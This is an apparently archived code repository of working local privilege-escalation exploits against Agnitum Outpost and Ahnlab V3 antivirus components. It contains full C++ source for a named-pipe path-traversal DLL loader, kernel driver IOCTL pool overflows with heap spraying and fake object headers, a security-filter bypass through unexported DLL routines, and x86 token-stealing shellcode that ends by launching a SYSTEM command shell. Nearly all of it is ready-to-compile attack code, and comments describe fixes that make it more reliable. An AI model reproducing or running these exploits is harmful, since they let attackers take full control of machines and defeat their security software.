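├── Agnitum
│   ├── SA54477_Outpost_acs.exe
│   │   ├── exploit.cpp
│   │   ├── exploit.exe
│   │   ├── make.bat
│   │   ├── x.cpp
│   │   └── x.dll
│   └── SA54477_sandbox.sys
│       ├── poc.cpp
│       └── poc.exe
├── Ahnlab
│   ├── SA54465_V3_MedCoreD.sys
│   │   ├── Analysis.docx
│   │   └── Code
│   │       ├── PoolBlade.cpp
│   │       ├── PoolBlade.h
│   │       ├── exploit.cpp
│   │       └── exploit.exe
│   └── V3_flt2k.sys
│       ├── ATampt.dll
│       ├── AhnCtlKd.dll
│       ├── exploit.cpp
│       └── exploit.exe
├── Avira
│   └── SA55412_Avipbb.sys_filterBypass_pooloverflow
│       ├── exploit.exe
│       ├── mfc100u.dll
│       └── mfc100u
│           ├── mfc100u.sln
│           ├── mfc100u.suo
│           └── mfc100u
│               ├── ReadMe.txt
│               ├── dllmain.cpp
│               ├── mfc100u.cpp
│               ├── mfc100u.h
│               ├── mfc100u.vcxproj
│               ├── mfc100u.vcxproj.filters
│               ├── mfc100u.vcxproj.user
│               ├── stdafx.cpp
│               ├── stdafx.h
│               └── targetver.h
├── Microsoft
│   └── MS13_037_ieActiveXploitationMethod
│       ├── js.htm
│       └── poc.htm
└── README.md

--------------------------------------------------------------------------------
/Agnitum/SA54477_Outpost_acs.exe/exploit.cpp:
--------------------------------------------------------------------------------
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wchar.h>
#pragma comment(lib, "Advapi32.lib")

/*
 * Opens the acs.exe IPC pipe \\.\pipe\acsipc_server.
 *
 * Returns the pipe handle, or NULL if it could not be opened (service not
 * running, or its DACL refuses us).  The caller owns the handle.
 *
 * The NULL-DACL security descriptor built here is only consulted when
 * CreateFile creates a new object; for an existing pipe instance only the
 * inherit flag matters.  It is kept because the original passed it.
 */
HANDLE GetNamedPipeHandle(void)
{
    SECURITY_DESCRIPTOR sd = {0};
    InitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION); /* revision 1 */
    SetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);               /* NULL DACL */

    SECURITY_ATTRIBUTES sa = {0};
    sa.nLength = sizeof(sa);
    sa.lpSecurityDescriptor = &sd;
    sa.bInheritHandle = FALSE;

    /* Same flags the original spelled as raw numbers: 0xC0000000, 3, 3, 0x80000080. */
    HANDLE h = CreateFile(TEXT("\\\\.\\pipe\\acsipc_server"),
                          GENERIC_READ | GENERIC_WRITE,
                          FILE_SHARE_READ | FILE_SHARE_WRITE,
                          &sa, OPEN_EXISTING,
                          FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL, NULL);
    return (h != INVALID_HANDLE_VALUE) ? h : NULL;
}

/*
 * Writes one command frame to the pipe.
 *
 * Frame layout (0x28-byte header, then dataLen payload bytes):
 *   +0x00  four fixed DWORDs (their meaning is not documented here; the
 *          service evidently expects them at the head of every frame)
 *   +0x10  command id (the BYTE widened to a DWORD)
 *   +0x14  0x30303030 ("0000")
 *   +0x18  payload length
 *   +0x1c  three zero DWORDs
 *   +0x28  payload
 *
 * Returns TRUE when the whole frame was written, FALSE on allocation or
 * WriteFile failure (the original returned nothing and ignored both).
 */
BOOL RunCommand(HANDLE handle, BYTE command, const BYTE *data, DWORD dataLen)
{
    static const DWORD fixedHeader[] = {0xd48a445e, 0x466e1597, 0x327416ba, 0x68ccde15};
    const DWORD headerLen = 0x28;
    DWORD frameLen = headerLen + dataLen;

    BYTE *frame = (BYTE *)calloc(frameLen, 1);   /* zeroed: +0x1c..+0x27 stay 0 */
    if (frame == NULL)
        return FALSE;

    memcpy(frame, fixedHeader, sizeof(fixedHeader));
    *(DWORD *)(frame + 0x10) = command;
    *(DWORD *)(frame + 0x14) = 0x30303030;
    *(DWORD *)(frame + 0x18) = dataLen;
    memcpy(frame + headerLen, data, dataLen);

    DWORD written = 0;
    BOOL ok = WriteFile(handle, frame, frameLen, &written, NULL) && written == frameLen;
    free(frame);
    return ok;
}

/*
 * Truncates `path` in place just after its last backslash, so
 * "C:\dir\exploit.exe" becomes "C:\dir\".
 *
 * A path with no backslash is left untouched; the original scanned
 * backwards past index 0 in that case.
 */
void GetDirectory(WCHAR *path)
{
    WCHAR *lastSep = wcsrchr(path, L'\\');
    if (lastSep != NULL)
        lastSep[1] = L'\0';
}

/*
 * Builds "\..\.. (x10)\<path to x.dll minus drive letter>", wraps it in the
 * payload layout command 0x17 takes (0x11 zero bytes, the NUL-terminated
 * UTF-16 path, three more zero bytes) and sends it to acsipc_server.
 * x.cpp's DllMain is what runs if the service loads that path.
 *
 * Returns 0 when the frame was written, 1 otherwise.
 */
int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;

    /* Locate x.dll next to this executable, in 8.3 form as the original did. */
    WCHAR currentPath[MAX_PATH];
    DWORD pathLen = GetModuleFileNameW(NULL, currentPath, MAX_PATH);
    if (pathLen == 0 || pathLen >= MAX_PATH) {
        printf("Unable to determine our own path\n");
        return 1;
    }
    GetDirectory(currentPath);
    if (wcslen(currentPath) + wcslen(L"x.dll") >= MAX_PATH) {
        printf("Path to x.dll is too long\n");
        return 1;
    }
    wcscat(currentPath, L"x.dll");
    if (GetShortPathNameW(currentPath, currentPath, MAX_PATH) == 0) {
        /* Usually means x.dll is not next to us; carry on with the long path. */
        printf("GetShortPathNameW failed (%lu) - is x.dll next to this exe?\n",
               GetLastError());
    }

    /* Drop "C:" and prefix ten "\.." components.  Assumes a plain drive
       path; a "\\?\" or UNC module path would need different handling. */
    const WCHAR *driveRelative = currentPath + 2;
    size_t travChars = 10 * 3 + wcslen(driveRelative) + 1;
    WCHAR *traversal = (WCHAR *)calloc(travChars, sizeof(WCHAR));
    if (traversal == NULL)
        return 1;
    for (int j = 0; j < 10; j++)
        wcscat(traversal, L"\\..");
    wcscat(traversal, driveRelative);

    /* Payload: 0x11 zero bytes, the string with its terminator, then the
       remaining 3 of the 0x14 padding bytes. */
    DWORD strBytes = (DWORD)((wcslen(traversal) + 1) * sizeof(WCHAR));
    DWORD dataLen = strBytes + 0x14;
    BYTE *data = (BYTE *)calloc(dataLen, 1);
    if (data == NULL) {
        free(traversal);
        return 1;
    }
    memcpy(data + 0x11, traversal, strBytes);

    int rc = 0;
    HANDLE pipe = GetNamedPipeHandle();
    if (pipe != NULL) {
        if (!RunCommand(pipe, 0x17, data, dataLen)) {
            printf("WriteFile to acsipc_server failed (%lu)\n", GetLastError());
            rc = 1;
        }
        CloseHandle(pipe);
    } else {
        printf("Unable to get handler, may be the antivirus service is down!\n");
        rc = 1;
    }

    free(data);
    free(traversal);
    return rc;
}

--------------------------------------------------------------------------------
/Agnitum/SA54477_Outpost_acs.exe/exploit.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Agnitum/SA54477_Outpost_acs.exe/exploit.exe
--------------------------------------------------------------------------------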
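/Agnitum/SA54477_Outpost_acs.exe/make.bat:
--------------------------------------------------------------------------------
cl /LD x.cpp
cl exploit.cpp
del *.obj
--------------------------------------------------------------------------------
/Agnitum/SA54477_Outpost_acs.exe/x.cpp:
--------------------------------------------------------------------------------
#include <windows.h>

/*
 * Payload DLL.  On DLL_PROCESS_ATTACH it spawns cmd.exe on the interactive
 * desktop (WinSta0\Default) so the shell is visible to the logged-on user,
 * whichever process ends up loading this module.
 *
 * Spawning a process from DllMain runs under the loader lock, which is
 * documented as unsupported; it works in practice here but keep this
 * function minimal.
 *
 * Fix versus the original: "cmd.exe" was passed as lpApplicationName, which
 * per CreateProcess does not use the search path (current directory only).
 * Passing it as the command line instead resolves it through the normal
 * search path, so the shell also appears when the host's working directory
 * is not System32.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    (void)hModule;
    (void)lpReserved;

    if (ul_reason_for_call != DLL_PROCESS_ATTACH)
        return TRUE;

    static char desktop[] = "WinSta0\\Default";
    static char commandLine[] = "cmd.exe";   /* writable: CreateProcess may modify it */

    STARTUPINFOA si;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    si.lpDesktop = desktop;

    PROCESS_INFORMATION pi;
    ZeroMemory(&pi, sizeof(pi));
    if (CreateProcessA(NULL, commandLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        /* Not waiting on the shell; just drop our references to it. */
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
    return TRUE;
}
--------------------------------------------------------------------------------
/Agnitum/SA54477_Outpost_acs.exe/x.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Agnitum/SA54477_Outpost_acs.exe/x.dll
--------------------------------------------------------------------------------
/Agnitum/SA54477_sandbox.sys/poc.cpp:
--------------------------------------------------------------------------------
#include <windows.h>
#include <string.h>

/* Bytes of 0x41 filler that follow the 0x1F-byte request header. */
#define SIZE 0x600000

/* Everything one DeviceIoControl call needs, bundled for ioctlreq(). */
typedef struct Argos {
    HANDLE handle;
    DWORD code;
    BYTE *buffer;
    DWORD len;
} ARGOS;

/*
 * Issues the IOCTL described by `args`.  It has a thread-procedure signature
 * so it could be run via CreateThread, but main() simply calls it.
 *
 * The device handle is opened FILE_FLAG_OVERLAPPED while lpOverlapped is
 * NULL; that combination is documented as unsupported and only works when
 * the driver completes the request synchronously (assumed here, as in the
 * original).
 *
 * Returns 0 if DeviceIoControl succeeded, 1 if it reported failure.
 */
DWORD WINAPI ioctlreq(VOID *args)
{
    const ARGOS *req = (const ARGOS *)args;
    BYTE outbuffer[0x200];
    DWORD bytesReturned = 0;

    BOOL ok = DeviceIoControl(req->handle, req->code, req->buffer, req->len,
                              outbuffer, sizeof(outbuffer), &bytesReturned, NULL);
    return ok ? 0 : 1;
}

/*
 * Opens \\.\SandBox and sends IOCTL 0x80000208 a request of SIZE + 0x1F
 * bytes: a header laid out exactly as the original PoC did (field meanings
 * are not documented here; note the unaligned DWORD at +0x1B) followed by
 * 0x600000 bytes of 0x41.  If the driver is vulnerable the call is not
 * expected to return cleanly.
 *
 * Returns -1 if the device cannot be opened or the buffer cannot be
 * allocated, else ioctlreq()'s result.  The original allocated ARGOS with
 * new and released it with free(); it now lives on the stack.
 */
int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;

    HANDLE handle = CreateFileA("\\\\.\\SandBox", GENERIC_READ | GENERIC_WRITE,
                                FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
                                FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, 0);
    if (handle == INVALID_HANDLE_VALUE)
        return -1;

    DWORD len = SIZE + 0x1F;
    /* 0x40 in the original == PAGE_EXECUTE_READWRITE. */
    BYTE *inbuffer = (BYTE *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (inbuffer == NULL) {
        CloseHandle(handle);
        return -1;
    }
    ZeroMemory(inbuffer, len);

    *(DWORD *)(inbuffer + 0x00) = 0x1024;
    *(DWORD *)(inbuffer + 0x04) = 0x4d;
    *(DWORD *)(inbuffer + 0x10) = len;
    *(DWORD *)(inbuffer + 0x14) = 0x0000BEEB;
    *(WORD *)(inbuffer + 0x18) = 0x1;
    *(BYTE *)(inbuffer + 0x1A) = 0x1;
    *(DWORD *)(inbuffer + 0x1B) = 0x80300000;   /* unaligned, as in the original */
    memset(inbuffer + 0x1F, 0x41, SIZE);

    ARGOS args;
    args.handle = handle;
    args.code = 0x80000208;
    args.buffer = inbuffer;
    args.len = len;
    DWORD rc = ioctlreq(&args);

    VirtualFree(inbuffer, 0, MEM_RELEASE);
    CloseHandle(handle);
    return (int)rc;
}
--------------------------------------------------------------------------------
/Agnitum/SA54477_sandbox.sys/poc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Agnitum/SA54477_sandbox.sys/poc.exe
--------------------------------------------------------------------------------
/Ahnlab/SA54465_V3_MedCoreD.sys/Analysis.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Ahnlab/SA54465_V3_MedCoreD.sys/Analysis.docx
--------------------------------------------------------------------------------
/Ahnlab/SA54465_V3_MedCoreD.sys/Code/PoolBlade.cpp:
--------------------------------------------------------------------------------
#include "PoolBlade.h"
#include <string.h>

/* No shellcode, no pool size: AutoExploitInit() refuses to run. */
PoolBlade::PoolBlade()
    : pShellcode(NULL), dwPoolSize(0), hArr(NULL), fake(NULL), buffer(NULL)
{
}

/*
 * shellcode: address planted at fake+0xA8.
 * size:      bytes of filler written before the fake pool/object header,
 *            i.e. the size of the allocation being overflowed.
 *
 * The original body was "PoolBlade(); pShellcode = ...;" - that constructs
 * and discards a temporary instead of delegating, so hArr/fake/buffer were
 * never initialised and ExploitFinish() deleted garbage.  All members are
 * initialised here.
 */
PoolBlade::PoolBlade(VOID *shellcode, DWORD size)
    : pShellcode(shellcode), dwPoolSize(size), hArr(NULL), fake(NULL), buffer(NULL)
{
}

/*
 * Creates 0x100000 Event objects whose handles are deliberately never
 * closed, presumably to consume existing free pool chunks before the
 * controlled allocations in AutoExploitInit().
 */
VOID PoolBlade::Fill()
{
    for (int i = 0; i < 0x100000; i++)
        CreateEvent(NULL, FALSE, FALSE, NULL);
}

/*
 * Sprays, punches holes, and builds the IOCTL input buffer.
 *
 * size (out): receives the buffer length, dwPoolSize + 0x16.
 * Returns the buffer (owned by this object until ExploitFinish()), or NULL
 * if the object was default-constructed.
 *
 * Layout of the returned buffer:
 *   dwPoolSize bytes of 0x41, then a trailer shaped like a pool header
 *   followed by an object header:
 *     +0x00  WORD   ((dwPoolSize + 8) / 8) & 0x1ff
 *     +0x02  BYTE   0x06
 *     +0x03  BYTE   0x0A
 *     +0x04  DWORD  0xee657645  (bytes 'E','v','e',0xEE)
 *     +0x08  DWORD  0xdeadfa11
 *     +0x0C  DWORD  0xcafebabe
 *     +0x10  DWORD  -> fake (0x190 zero bytes, shellcode address at +0xA8)
 *     +0x14  WORD   0
 *   How the kernel ends up dereferencing fake+0xA8 is the author's
 *   technique (see Analysis.docx); it is not visible in this code.
 */
BYTE *PoolBlade::AutoExploitInit(DWORD *size)
{
    if (pShellcode == NULL || dwPoolSize == 0)
        return NULL;

    Fill();

    /* 0x10000 tracked events, then every 0x200 events close
       (dwPoolSize / 0x30) + 1 consecutive ones.  0x30 presumably
       approximates one Event's pool footprint on the target - not verified
       here.  Closed slots are NULLed so ExploitFinish() skips them
       (the original closed them a second time). */
    hArr = new HANDLE[0x10000];
    for (int i = 0; i < 0x10000; i++)
        hArr[i] = CreateEvent(NULL, FALSE, FALSE, NULL);

    const int holeLen = (int)(dwPoolSize / 0x30) + 1;
    for (int i = 0; i < 0xf000; i += 0x200) {
        for (int j = 0; j < holeLen && i + j < 0x10000; j++) {
            CloseHandle(hArr[i + j]);
            hArr[i + j] = NULL;
        }
    }

    *size = dwPoolSize + 0x16;
    buffer = new BYTE[*size];
    memset(buffer, 0x41, dwPoolSize);

    fake = new BYTE[0x190];
    memset(fake, 0, 0x190);
    *(DWORD *)(fake + 0xA8) = (DWORD)pShellcode;

    BYTE *trailer = buffer + dwPoolSize;
    *(WORD *)(trailer + 0x00) = (WORD)(((dwPoolSize + 8) / 8) & 0x1ff);
    trailer[0x02] = 0x06;
    trailer[0x03] = 0x0A;
    *(DWORD *)(trailer + 0x04) = 0xee657645;
    *(DWORD *)(trailer + 0x08) = 0xdeadfa11;
    *(DWORD *)(trailer + 0x0C) = 0xcafebabe;
    *(DWORD *)(trailer + 0x10) = (DWORD)fake;
    *(WORD *)(trailer + 0x14) = 0;
    return buffer;
}

/*
 * Closes the tracked events that are still open and releases the buffers.
 * Safe to call on a default-constructed object.  Arrays allocated with
 * new[] are released with delete[] (the original used plain delete).
 */
VOID PoolBlade::ExploitFinish()
{
    if (hArr != NULL) {
        for (int i = 0; i < 0x10000; i++) {
            if (hArr[i] != NULL)
                CloseHandle(hArr[i]);
        }
        delete[] hArr;
        hArr = NULL;
    }
    delete[] fake;
    fake = NULL;
    delete[] buffer;
    buffer = NULL;
}
--------------------------------------------------------------------------------
/Ahnlab/SA54465_V3_MedCoreD.sys/Code/PoolBlade.h:
--------------------------------------------------------------------------------
#pragma once
#include <windows.h>

/*
 * Helper for the MeDCoreD pool-overflow exploit.  Sprays Event objects,
 * punches holes of roughly the overflowed allocation's size, and builds an
 * IOCTL input buffer whose tail impersonates the pool/object header that
 * follows the allocation.
 *
 * Usage: AutoExploitInit(&len) -> DeviceIoControl(...) -> ExploitFinish().
 */
class PoolBlade
{
private:
    VOID *pShellcode;   /* address planted at fake+0xA8 */
    DWORD dwPoolSize;   /* bytes of 0x41 filler before the fake header */
    HANDLE *hArr;       /* 0x10000 tracked events; NULL entries were closed early */
    BYTE *fake;         /* 0x190-byte block the trailer points at */
    BYTE *buffer;       /* dwPoolSize + 0x16 bytes, owned by this object */
    VOID Fill();

public:
    PoolBlade(VOID *, DWORD);
    PoolBlade();
    BYTE *AutoExploitInit(DWORD *);
    VOID ExploitFinish();
};
--------------------------------------------------------------------------------
/Ahnlab/SA54465_V3_MedCoreD.sys/Code/exploit.cpp:
--------------------------------------------------------------------------------
#include <windows.h>
#include <stdio.h>
#include "PoolBlade.h"

/* Structure offsets for 32-bit Windows XP SP3 only.  The shellcode below is
   hard-wired to them and will corrupt memory on any other build. */
#define _KPROCESS 0x44
#define _TOKEN    0xc8
#define _UPID     0x84
#define _APLINKS  0x88

/*
 * Token-stealing payload (kernel mode, XP SP3 x86):
 *   fs:[0x124]             -> current KTHREAD
 *   KTHREAD + _KPROCESS    -> current EPROCESS (kept in ecx)
 *   EPROCESS + _APLINKS    -> ActiveProcessLinks; "sub eax, 88h" turns the
 *                             LIST_ENTRY pointer back into an EPROCESS
 *   EPROCESS + _UPID == 4  -> the System process
 *   EPROCESS + _TOKEN      -> its Token is copied over ours
 * Only edx/ebx are saved.  The old token read into ebx is never restored or
 * released and no reference counts are touched.  Keep the asm identical to
 * the copies in V3_flt2k/exploit.cpp and Avira/.../dllmain.cpp.
 */
VOID shellcode()
{
    __asm
    {
        push edx
        push ebx
        xor eax, eax
        mov eax, fs:[eax+124h]
        mov eax, [eax+_KPROCESS]
        mov ecx, eax
        mov ebx, [eax+_TOKEN]
    L:  mov eax, [eax+_APLINKS]
        sub eax, 88h
        cmp [eax+_UPID], 4
        jnz L
        mov edx, [eax+_TOKEN]
        mov eax, ecx
        mov [eax+_TOKEN], edx
        pop ebx
        pop edx
    }
}

/*
 * Opens \\.\MeDCoreD_V3IS80, sends IOCTL 0xA3350014 the PoolBlade buffer
 * (0x7d0 bytes of filler + fake header) and then spawns CMD.
 *
 * Returns -1 if the device cannot be opened, 0 otherwise.  The "Enjoy"
 * message and CMD launch are unconditional, exactly as in the original -
 * they do not indicate that the token swap succeeded.  The PoolBlade object
 * now lives on the stack instead of being leaked via new.
 */
int main()
{
    HANDLE handle = CreateFileA("\\\\.\\MeDCoreD_V3IS80", GENERIC_READ | GENERIC_WRITE,
                                FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
                                FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, 0);
    if (handle == INVALID_HANDLE_VALUE)
        return -1;

    PoolBlade pb((VOID *)shellcode, 0x7d0);
    DWORD inSize = 0;
    BYTE *inbuffer = pb.AutoExploitInit(&inSize);
    if (inbuffer == NULL) {
        CloseHandle(handle);
        return -1;
    }

    char outbuffer[0x100];
    DWORD dwSz = 0;
    /* Overlapped handle with a NULL OVERLAPPED: unsupported per docs, works
       only if the driver completes synchronously (as the original assumed). */
    DeviceIoControl(handle, 0xA3350014, inbuffer, inSize, outbuffer, sizeof(outbuffer),
                    &dwSz, NULL);
    pb.ExploitFinish();
    CloseHandle(handle);

    printf("Enjoy your system shell ;)\n\n");
    WinExec("CMD", SW_SHOWNORMAL);
    return 0;
}
--------------------------------------------------------------------------------
/Ahnlab/SA54465_V3_MedCoreD.sys/Code/exploit.exe:
--------------------------------------------------------------------------------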
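https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Ahnlab/SA54465_V3_MedCoreD.sys/Code/exploit.exe
--------------------------------------------------------------------------------
/Ahnlab/V3_flt2k.sys/ATampt.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Ahnlab/V3_flt2k.sys/ATampt.dll
--------------------------------------------------------------------------------
/Ahnlab/V3_flt2k.sys/AhnCtlKd.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Ahnlab/V3_flt2k.sys/AhnCtlKd.dll
--------------------------------------------------------------------------------
/Ahnlab/V3_flt2k.sys/exploit.cpp:
--------------------------------------------------------------------------------
#include <windows.h>
#include <stdio.h>
#include <string.h>

#define OVERFLOW_SIZE 0x816
#define IOCTLCODE     0xA337085C

/*
 * Argument block handed to the two ATampt.dll routines below.  Only handle,
 * buffer and buffer2 are populated.  Offsets follow from seven 4-byte
 * members; the original's comments listed unused4 at +0x10 and buffer2 at
 * +0x14.  If ATampt.dll actually reads buffer2 at +0x14 this struct has one
 * member too many - verify against the DLL before relying on it.
 */
typedef struct ARGUMENTS
{
    HANDLE handle;   //+0x00
    BYTE *buffer;    //+0x04
    DWORD unused0;   //+0x08
    DWORD unused1;   //+0x0C
    DWORD unused3;   //+0x10
    DWORD unused4;   //+0x14
    BYTE *buffer2;   //+0x18
} ARGS;

typedef DWORD (*TypeAuthorize)(ARGS *a1);
typedef DWORD (WINAPI *TypeSecureIoControl)(ARGS *a1, BOOL someFlag, DWORD dwIoControlCode,
                                            BYTE *realInput, size_t Size, LPVOID lpOutBuffer,
                                            DWORD nOutBufferSize, LPDWORD lpBytesReturned,
                                            LPOVERLAPPED lpOverlapped);

/*
 * Returns the module handle for `libName`, loading it if it is not already
 * mapped.  A bare name goes through the normal DLL search path, so the
 * ATampt.dll shipped next to exploit.exe is what gets picked up.
 * Returns NULL if the library cannot be loaded.
 */
HMODULE GetLibraryA(CHAR *libName)
{
    HMODULE hmd = GetModuleHandleA(libName);
    if (hmd == NULL)
        hmd = LoadLibraryA(libName);
    return hmd;
}

/*
 * Calls the unexported routine at ATampt.dll+0x68A6, which the author uses
 * to get this process authorised with the driver before the IOCTL (the
 * "security filter" the file name refers to).  Returns that routine's
 * result (0 is treated as success by main), or GetLastError() if the DLL
 * cannot be loaded.
 *
 * The RVA is specific to the ATampt.dll build checked in alongside this
 * file; any other build needs the offsets re-derived.
 */
DWORD BypassSecurityFilter(ARGS *args)
{
    HMODULE hmd = GetLibraryA("ATampt.dll");
    if (hmd == NULL)
        return GetLastError();
    TypeAuthorize Authorize = (TypeAuthorize)((DWORD)hmd + 0x68A6);
    return Authorize(args);
}

/*
 * Sends an IOCTL through ATampt.dll's own wrapper at +0x6BC9 (same
 * build-specific caveat as above) rather than DeviceIoControl directly.
 * Returns the wrapper's result, or GetLastError() if the DLL is missing.
 */
DWORD IoControl(ARGS *args, DWORD dwIoControlCode, BYTE *realInput, size_t Size,
                LPVOID lpOutBuffer, DWORD nOutBufferSize)
{
    HMODULE hmd = GetLibraryA("ATampt.dll");
    if (hmd == NULL)
        return GetLastError();
    TypeSecureIoControl SecureIoControl = (TypeSecureIoControl)((DWORD)hmd + 0x6BC9);
    DWORD BytesReturned = 0;
    return SecureIoControl(args, TRUE, dwIoControlCode, realInput, Size, lpOutBuffer,
                           nOutBufferSize, &BytesReturned, NULL);
}

/* Structure offsets for 32-bit Windows XP SP3 only; see shellcode below. */
#define _KPROCESS 0x44
#define _TOKEN    0xc8
#define _UPID     0x84
#define _APLINKS  0x88

/*
 * Token-stealing payload (kernel mode, XP SP3 x86): walks ActiveProcessLinks
 * from the current EPROCESS until UniqueProcessId == 4 (System) and copies
 * that Token over our own.  Only edx/ebx are saved; the old token is not
 * restored and no reference counts are touched.  Keep byte-identical to the
 * copies in the MeDCoreD and Avira exploits.
 */
VOID SHELLCODE()
{
    __asm
    {
        push edx
        push ebx
        xor eax, eax
        mov eax, fs:[eax+124h]
        mov eax, [eax+_KPROCESS]
        mov ecx, eax
        mov ebx, [eax+_TOKEN]
    L:  mov eax, [eax+_APLINKS]
        sub eax, 88h
        cmp [eax+_UPID], 4
        jnz L
        mov edx, [eax+_TOKEN]
        mov eax, ecx
        mov [eax+_TOKEN], edx
        pop ebx
        pop edx
    }
}

/*
 * Sprays the pool, opens \\.\V3Flt2k, authorises through ATampt.dll and
 * sends IOCTLCODE an 0x816-byte input: 0x800 bytes of 0x45 followed by the
 * same fake pool/object header trailer the MeDCoreD PoolBlade builds, with
 * the fake object's +0xA8 slot pointing at SHELLCODE.
 *
 * Returns -1 if the device cannot be opened, 0 otherwise.  The "Enjoy"
 * message and CMD launch are unconditional, as in the original.  Changes:
 * the 0x10000-entry handle array is heap-allocated (256 KiB was on the
 * stack), closed spray slots are NULLed so they are not closed twice, the
 * authorise/IOCTL results are printed instead of dropped, and the ARGS
 * buffers are released.
 */
int main()
{
    /* Spray (cf. PoolBlade::AutoExploitInit): 0x100000 leaked events, then
       0x10000 tracked ones with 0x2b consecutive closes every 0x200. */
    for (int i = 0; i < 0x100000; i++)
        CreateEvent(NULL, FALSE, FALSE, NULL);

    HANDLE *hArr = new HANDLE[0x10000];
    for (int i = 0; i < 0x10000; i++)
        hArr[i] = CreateEvent(NULL, FALSE, FALSE, NULL);

    for (int i = 0; i < 0xf000; i += 0x200) {
        for (int j = 0; j < 0x2b; j++) {
            CloseHandle(hArr[i + j]);
            hArr[i + j] = NULL;
        }
    }

    HANDLE handle = CreateFileA("\\\\.\\V3Flt2k", GENERIC_READ | GENERIC_WRITE,
                                FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
                                FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, 0);
    if (handle == INVALID_HANDLE_VALUE) {
        for (int i = 0; i < 0x10000; i++) {
            if (hArr[i] != NULL)
                CloseHandle(hArr[i]);
        }
        delete[] hArr;
        return -1;
    }

    ARGS *args = new ARGS();          /* value-initialised: unused fields are 0 */
    args->handle = handle;
    args->buffer = new BYTE[0x10];
    ZeroMemory(args->buffer, 0x10);
    args->buffer2 = new BYTE[0x10];
    ZeroMemory(args->buffer2, 0x10);

    DWORD auth = BypassSecurityFilter(args);
    if (auth != 0) {
        printf("ATampt.dll authorize routine returned 0x%08lx\n", auth);
    } else {
        BYTE fake[0x190];
        memset(fake, 0, sizeof(fake));
        *(DWORD *)(fake + 0xA8) = (DWORD)SHELLCODE;

        /* Trailer at +0x800, same shape as PoolBlade's: WORD 0x0101, bytes
           0x06 0x0A, 'Eve' tag, 0xdeadfa11, 0xcafebabe, pointer to fake,
           WORD 0 in the last two bytes. */
        BYTE input[OVERFLOW_SIZE];
        memset(input, 0x45, sizeof(input));
        input[0x800] = 0x01;
        input[0x801] = 0x01;
        input[0x802] = 0x06;
        input[0x803] = 0x0A;
        *(DWORD *)(input + 0x804) = 0xee657645;
        *(DWORD *)(input + 0x808) = 0xdeadfa11;
        *(DWORD *)(input + 0x80C) = 0xcafebabe;
        *(DWORD *)(input + 0x810) = (DWORD)fake;
        *(WORD *)(input + OVERFLOW_SIZE - 2) = 0;

        char output[0x40];
        DWORD status = IoControl(args, IOCTLCODE, input, sizeof(input), output, sizeof(output));
        printf("SecureIoControl returned 0x%08lx\n", status);
    }

    for (int i = 0; i < 0x10000; i++) {
        if (hArr[i] != NULL)
            CloseHandle(hArr[i]);
    }
    delete[] hArr;
    delete[] args->buffer;
    delete[] args->buffer2;
    delete args;
    CloseHandle(handle);

    printf("Enjoy your system shell ;)\n\n");
    WinExec("CMD", SW_SHOWNORMAL);
    return 0;
}
--------------------------------------------------------------------------------
/Ahnlab/V3_flt2k.sys/exploit.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Ahnlab/V3_flt2k.sys/exploit.exe
--------------------------------------------------------------------------------
/Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/exploit.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/exploit.exe
--------------------------------------------------------------------------------
/Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u.dll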
